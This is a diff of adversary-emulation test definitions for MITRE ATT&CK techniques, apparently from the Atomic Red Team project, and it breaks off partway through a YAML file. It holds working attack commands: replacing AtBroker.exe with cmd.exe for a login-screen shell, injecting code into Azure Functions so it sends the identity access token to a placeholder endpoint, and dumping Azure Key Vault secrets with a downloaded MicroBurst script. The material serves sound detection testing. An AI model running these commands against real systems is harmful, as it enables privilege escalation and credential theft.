+    Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+      takeown /F C:\Windows\System32\AtBroker.exe /A
+      icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+    name: command_prompt
+    elevation_required: true
@@ -539,6 +539,9 @@ This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Win


 ```powershell
+if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")){
+  New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+}
 if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
  New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
 }
@@ -248,6 +248,9 @@ atomic_tests:
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
+      if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")){
+        New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+      }
      if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
        New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
      }
@@ -1,271 +0,0 @@
-# T1550.001 - Use Alternate Authentication Material: Application Access Token
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1550/001)
-<blockquote>
-
-Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.
-
-Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) 
-
-OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
-
-For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
-
-Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)
-
-Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.  For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.
-
-</blockquote>
-
-## Atomic Tests
-
- [Atomic Test #1 - Azure - Functions code upload - Functions code injection via Blob upload](#atomic-test-1---azure---functions-code-upload---functions-code-injection-via-blob-upload)
-
- [Atomic Test #2 - Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token](#atomic-test-2---azure---functions-code-upload---functions-code-injection-via-file-share-modification-to-retrieve-the-functions-identity-access-token)
-
-
-<br/>
-
-## Atomic Test #1 - Azure - Functions code upload - Functions code injection via Blob upload
-This test injects code into an Azure Function (RCE).
-
-Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
-
-Similar to T1550.001 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token", the depicted code injection scenario tampers the source code of Azure Functions to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance. In this case, the prepared zip file (underlying package for a Function) is expected to contain the tampered function presented in src/code_to_insert.py. Note that the endpoint https://changeme.net needs to be adapted in your packed function code.
-
-Note:
- The Azure Function modified in this test must be hosted via Azure Blob storage (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations). 
- For Function code upload to Azure Functions that are hosted via Azure Files in a File Share, refer to T1550.001 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token".
- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
-
-Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
-
-**Supported Platforms:** Iaas:azure
-
-
-**auto_generated_guid:** 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| storage_account_name | Name of storage account that is related to the Function | string | storage_account_name_example|
-| container_name | Name of the container that contains the function blob | string | container_name_example|
-| blob_name | Name of the function blob | string | blob_example|
-| file_path_blob | Path to the function code file to upload as blob | path | $env:temp/T1550.001_function_code.zip|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-az login    # Log in to Azure CLI
-
-$allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
-
-if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
-    Write-Output "Shared key access is disabled for this storage account."
-} else {    
-    $connectionString = az storage account show-connection-string --name "#{storage_account_name}" --query connectionString --output tsv
-
-    # Download blob for cleanup
-    $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-    az storage blob download --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file $tmpOriginalFunctionCode --overwrite true
-
-    if ($LASTEXITCODE -eq 0) {
-        # Upload new blob version if download of existing blob succeeded
-        az storage blob upload --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file "#{file_path_blob}" --overwrite true
-    } else {
-        Write-Output "Download original function code failed."
-        exit 1
-    }
-}
-```
-
-#### Cleanup Commands:
-```powershell
-az login    # Log in to Azure CLI
-
-# Upload previous funciton code
-$tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-if ($LASTEXITCODE -eq 0) {
-    Write-Output "Uploaded original version of function code."
-
-    # Delete tmp original blob file if upload succeeded
-    Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-    Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-} else {
-    Write-Output "Upload original function code failed."
-}
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Azure CLI must be installed
-##### Check Prereq Commands:
-```powershell
-try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Install-Module -Name Az -Force
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token
-This test injects code into an Azure Function (RCE) to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance.
-
-Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
-
-Once executed, the "https://changeme" will retrieve the access token when the function app is executed on behalf of the tenant. The function may be triggered manually from authorized people, triggered in regular intervals, or in various other ways. The access token can then be used to perform further attack steps with the permissions that the function app holds (e.g. listening virtual machines).
-
-Note: 
- The Azure Function modified in this test must be hosted via Azure Files in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
- For Function code upload to Azure Functions that are hosted via Azure Blob storage, refer to T1550.001 "Azure - Functions code upload - Functions code injection via Blob upload".
- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
- Important: Change the https://changeme.net in code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted e.g. as request bin via Pipedream to display the body of incoming POST requests.
- The default injected code to retrieve the access token can be replaced by arbitrary other code. In this case: Replace the code defined in code_to_insert_path
-
-Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
-
-Execution options: Defined by the input field execution_option
- insert_code: This option (1) downloads the existing funciton code into a tmp file, (2) injects the code from code_to_insert_path at the beginning of the file, and (3) uploads the tampered file to the targeted Azure Function code (Azure File Share File).
- replace_file: This option uploads the function code defined in code_to_insert_path to the targeted Azure Function code (Azure File Share File).
-
-**Supported Platforms:** Iaas:azure
-
-
-**auto_generated_guid:** 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| storage_account_name | Name of storage account that is related to the Function | string | storage_account_name_example|
-| execution_option | Chooses execution option insert_code, or replace_file | string | insert_code|
-| file_share_name | Name of the file share that is related to the Function | string | file_share_name_example|
-| file_path | Path to the Function file in the file share | path | site/wwwroot/function_app.py|
-| code_to_insert_path | The code that will be injected into the Function | path | $PathToAtomicsFolder/T1550.001/src/code_to_insert.py|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-az login    # Log in to Azure CLI
-
-$allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
-
-if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
-    Write-Output "Shared key access is disabled for this storage account."
-} else {
-    # Download file for cleanup
-    $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-    $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-    az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpOriginalFunctionCode
-
-    if ($LASTEXITCODE -eq 0) {
-        # Upload new funciton code if download of existing code succeeded
-        if ("#{execution_option}" -eq "insert_code") {
-            # Download file from file share for injection
-            $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-            az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpFunctionCode
-            
-            if ($LASTEXITCODE -ne 0) {
-                Write-Output "Function code download failed."
-                exit 1
-            }
-            Write-Output "File downloaded: $($tmpFunctionCode)"
-            
-            $insertContent = Get-Content -Path "#{code_to_insert_path}" -Raw  # Load the content of the insert file
-            
-            $content = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file
-            $content = $insertContent + "`n" + $content     # Insert the new code at the beginning
-            $content | Set-Content -Path $tmpFunctionCode       # Write the modified content to the file
-            
-            # Upload file to file share
-            az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpFunctionCode --only-show-errors
-            if ($LASTEXITCODE -ne 0) {
-                Write-Output "Function code upload failed."
-                exit 1
-            }
-            Write-Output "Uploaded the tampered file"
-        } elseif ("#{execution_option}" -eq "replace_file") {
-            az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source "#{code_to_insert_path}" --only-show-errors
-            if ($LASTEXITCODE -ne 0) {
-                Write-Output "Function code upload failed."
-                exit 1
-            }
-            Write-Output "Uploaded the tampered file"
-        } else {
-            Write-Output "Please choose a valid execution_option"
-            exit 1
-        }
-    } else {
-        Write-Output "Download original function code failed."
-        exit 1
-    }
-}
-```
-
-#### Cleanup Commands:
-```powershell
-az login    # Log in to Azure CLI
-
-# Upload previous funciton code
-$tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-$tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-if ($LASTEXITCODE -eq 0) {
-    Write-Output "Uploaded original version of function code."
-
-    # Delete tmp original f file if upload succeeded
-    if ("#{execution_option}" -eq "insert_code") {
-        $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-        Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-        Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-    }
-
-    # Delete tmp original file
-    Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-    Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-} else {
-    Write-Output "Upload original function code failed."
-}
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Azure CLI must be installed
-##### Check Prereq Commands:
-```powershell
-try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Install-Module -Name Az -Force
-```
-
-
-
-
-<br/>
@@ -1,218 +0,0 @@
-attack_technique: T1550.001
-display_name: 'Use Alternate Authentication Material: Application Access Token'
-atomic_tests:
- name: Azure - Functions code upload - Functions code injection via Blob upload
-  auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-  description: |-
-    This test injects code into an Azure Function (RCE).
-
-    Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
-
-    Similar to T1550.001 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token", the depicted code injection scenario tampers the source code of Azure Functions to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance. In this case, the prepared zip file (underlying package for a Function) is expected to contain the tampered function presented in src/code_to_insert.py. Note that the endpoint https://changeme.net needs to be adapted in your packed function code.
-
-    Note:
-    - The Azure Function modified in this test must be hosted via Azure Blob storage (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations). 
-    - For Function code upload to Azure Functions that are hosted via Azure Files in a File Share, refer to T1550.001 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token".
-    - The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
-
-    Requirements:
-    - The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
-    - The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
-  supported_platforms:
-    - iaas:azure
-  input_arguments:
-    storage_account_name:
-      type: string
-      default: storage_account_name_example
-      description: Name of storage account that is related to the Function
-    container_name:
-      type: string
-      default: container_name_example
-      description: Name of the container that contains the function blob
-    blob_name:
-      type: string
-      default: blob_example
-      description: Name of the function blob
-    file_path_blob:
-      type: path
-      default: $env:temp/T1550.001_function_code.zip
-      description: Path to the function code file to upload as blob
-  dependency_executor_name: powershell
-  dependencies:
-    - description: Azure CLI must be installed
-      prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-      get_prereq_command: Install-Module -Name Az -Force
-  executor:
-    command: |
-      az login    # Log in to Azure CLI
-
-      $allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
-
-      if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
-          Write-Output "Shared key access is disabled for this storage account."
-      } else {    
-          $connectionString = az storage account show-connection-string --name "#{storage_account_name}" --query connectionString --output tsv
-
-          # Download blob for cleanup
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-          az storage blob download --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file $tmpOriginalFunctionCode --overwrite true
-
-          if ($LASTEXITCODE -eq 0) {
-              # Upload new blob version if download of existing blob succeeded
-              az storage blob upload --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file "#{file_path_blob}" --overwrite true
-          } else {
-              Write-Output "Download original function code failed."
-              exit 1
-          }
-      }
-    cleanup_command: |-
-      az login    # Log in to Azure CLI
-
-      # Upload previous funciton code
-      $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-      az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-      if ($LASTEXITCODE -eq 0) {
-          Write-Output "Uploaded original version of function code."
-
-          # Delete tmp original blob file if upload succeeded
-          Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-          Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-      } else {
-          Write-Output "Upload original function code failed."
-      }
-    name: powershell
-    elevation_required: false
- name: Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token
-  auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-  description: |-
-    This test injects code into an Azure Function (RCE) to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance.
-
-    Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
-
-    Once executed, the "https://changeme" will retrieve the access token when the function app is executed on behalf of the tenant. The function may be triggered manually from authorized people, triggered in regular intervals, or in various other ways. The access token can then be used to perform further attack steps with the permissions that the function app holds (e.g. listening virtual machines).
-
-    Note: 
-    - The Azure Function modified in this test must be hosted via Azure Files in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
-    - For Function code upload to Azure Functions that are hosted via Azure Blob storage, refer to T1550.001 "Azure - Functions code upload - Functions code injection via Blob upload".
-    - The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
-    - Important: Change the https://changeme.net in code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted e.g. as request bin via Pipedream to display the body of incoming POST requests.
-    - The default injected code to retrieve the access token can be replaced by arbitrary other code. In this case: Replace the code defined in code_to_insert_path
-
-    Requirements:
-    - The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
-    - The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
-
-    Execution options: Defined by the input field execution_option
-    - insert_code: This option (1) downloads the existing funciton code into a tmp file, (2) injects the code from code_to_insert_path at the beginning of the file, and (3) uploads the tampered file to the targeted Azure Function code (Azure File Share File).
-    - replace_file: This option uploads the function code defined in code_to_insert_path to the targeted Azure Function code (Azure File Share File).
-  supported_platforms:
-    - iaas:azure
-  input_arguments:
-    storage_account_name:
-      type: string
-      default: storage_account_name_example
-      description: Name of storage account that is related to the Function
-    execution_option:
-      type: string
-      default: insert_code
-      description: Chooses execution option insert_code, or replace_file
-    file_share_name:
-      type: string
-      default: file_share_name_example
-      description: Name of the file share that is related to the Function
-    file_path:
-      type: path
-      default: site/wwwroot/function_app.py
-      description: Path to the Function file in the file share
-    code_to_insert_path:
-      type: path
-      default: $PathToAtomicsFolder/T1550.001/src/code_to_insert.py
-      description: The code that will be injected into the Function
-  dependency_executor_name: powershell
-  dependencies:
-    - description: Azure CLI must be installed
-      prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-      get_prereq_command: Install-Module -Name Az -Force
-  executor:
-    command: |-
-      az login    # Log in to Azure CLI
-
-      $allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
-
-      if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
-          Write-Output "Shared key access is disabled for this storage account."
-      } else {
-          # Download file for cleanup
-          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-          az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpOriginalFunctionCode
-
-          if ($LASTEXITCODE -eq 0) {
-              # Upload new funciton code if download of existing code succeeded
-              if ("#{execution_option}" -eq "insert_code") {
-                  # Download file from file share for injection
-                  $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-                  az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpFunctionCode
-                  
-                  if ($LASTEXITCODE -ne 0) {
-                      Write-Output "Function code download failed."
-                      exit 1
-                  }
-                  Write-Output "File downloaded: $($tmpFunctionCode)"
-                  
-                  $insertContent = Get-Content -Path "#{code_to_insert_path}" -Raw  # Load the content of the insert file
-                  
-                  $content = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file
-                  $content = $insertContent + "`n" + $content     # Insert the new code at the beginning
-                  $content | Set-Content -Path $tmpFunctionCode       # Write the modified content to the file
-                  
-                  # Upload file to file share
-                  az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpFunctionCode --only-show-errors
-                  if ($LASTEXITCODE -ne 0) {
-                      Write-Output "Function code upload failed."
-                      exit 1
-                  }
-                  Write-Output "Uploaded the tampered file"
-              } elseif ("#{execution_option}" -eq "replace_file") {
-                  az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source "#{code_to_insert_path}" --only-show-errors
-                  if ($LASTEXITCODE -ne 0) {
-                      Write-Output "Function code upload failed."
-                      exit 1
-                  }
-                  Write-Output "Uploaded the tampered file"
-              } else {
-                  Write-Output "Please choose a valid execution_option"
-                  exit 1
-              }
-          } else {
-              Write-Output "Download original function code failed."
-              exit 1
-          }
-      }
-    cleanup_command: |-
-      az login    # Log in to Azure CLI
-
-      # Upload previous funciton code
-      $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-      $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-      az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-      if ($LASTEXITCODE -eq 0) {
-          Write-Output "Uploaded original version of function code."
-
-          # Delete tmp original f file if upload succeeded
-          if ("#{execution_option}" -eq "insert_code") {
-              $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-              Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-          }
-
-          # Delete tmp original file
-          Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-          Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-      } else {
-          Write-Output "Upload original function code failed."
-      }
-    name: powershell
-    elevation_required: false
@@ -14,6 +14,5 @@ atomic_tests:
      default: myapp.app
  executor:
    command: |
-      sudo xattr -d com.apple.quarantine #{app_path}
-    elevation_required: true
+      xattr -d com.apple.quarantine #{app_path}
    name: sh
@@ -0,0 +1,96 @@
+# T1555.006 - Credentials from Password Stores: Cloud Secrets Management Stores
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1555/006)
+<blockquote>
+
+Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.  
+
+Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.  
+
+If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)
+
+**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.
+
+</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst](#atomic-test-1---azure---dump-all-azure-key-vaults-with-microburst)
+
+
+<br/>
+
+## Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst
+Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
+See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | string | |
+| password | Azure AD password | string | T1082Az|
+| output_file | File to dump results to | string | $env:temp&#92;T1528Test1.txt|
+| subscription_id | Azure subscription id to search | string | |
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+Connect-AzureRmAccount -Credential $Credential
+Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```powershell
+remove-item #{output_file} -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
+##### Check Prereq Commands:
+```powershell
+if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+```
+##### Description: The Azure RM module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureRM -Force -allowclobber
+```
+##### Description: The Azure module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Azure -Force -allowclobber
+```
+
+
+
+
+<br/>
@@ -0,0 +1,60 @@
+attack_technique: T1555.006
+display_name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
+atomic_tests:
+- name: Azure - Dump All Azure Key Vaults with Microburst
+  auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
+  description: |-
+    Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
+    See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: string
+      default:
+    password:
+      description: Azure AD password
+      type: string
+      default: T1082Az
+    output_file:
+      description: File to dump results to
+      type: string
+      default: $env:temp\T1528Test1.txt
+    subscription_id:
+      description: Azure subscription id to search
+      type: string
+      default:
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
+    prereq_command: |
+      if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit 0} else {exit 1}
+    get_prereq_command: |
